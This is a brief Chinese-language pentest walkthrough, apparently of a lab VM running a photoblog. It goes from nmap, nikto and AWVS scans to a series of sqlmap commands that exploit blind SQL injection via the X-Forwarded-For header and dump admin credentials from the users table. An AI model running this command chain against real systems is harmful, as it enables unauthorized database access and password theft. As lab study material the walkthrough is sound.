nmap -sV xxxxx
nmap -T4 -A -v xxxx
nikto -host http://192.168.173.134/
发现了后台登陆地址,但弱口令无法登陆
使用awvs扫描 安全漏洞
高危漏洞 盲注
使用sqlmap进行 注入
sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” --dbs --batch
python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” --dbs --batch
得到两个数据库名
python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” --tables --batch
python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” -T “users” --columns --batch
python sqlmap.py -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -D “photoblog” -T “users” -C “login,password” --dump --batch
得到管理员密码